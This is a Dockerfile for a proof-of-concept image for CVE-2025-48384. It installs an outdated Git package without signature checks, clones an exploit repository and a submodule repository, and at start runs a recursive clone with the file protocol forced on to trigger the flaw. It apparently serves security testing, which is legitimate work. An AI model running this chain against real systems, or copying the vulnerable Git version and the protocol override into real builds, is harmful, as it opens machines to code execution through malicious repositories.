# Dockerfile
FROM --platform=linux/amd64 alpine:3.18


LABEL maintainer="github.com/vinieger"
LABEL description="PoC image for CVE-2025-48384"

# Install vulnerable Git version
RUN apk add --no-cache wget && \
    wget https://dl-cdn.alpinelinux.org/alpine/v3.18/main/x86_64/git-2.40.4-r0.apk && \
    apk add --no-cache --allow-untrusted git-2.40.4-r0.apk && \
    rm -f git-2.40.4-r0.apk

# Clone and run exploit at container start
RUN git clone https://github.com/vinieger/CVE-2025-48384.git && \
    git clone https://github.com/liamg/CVE-2025-48384-submodule.git

CMD sh -c 'git -c protocol.file.allow=always clone --recurse-submodules ./CVE-2025-48384 poc 2>&1 | tee /tmp/poc.log; tail -f /dev/null'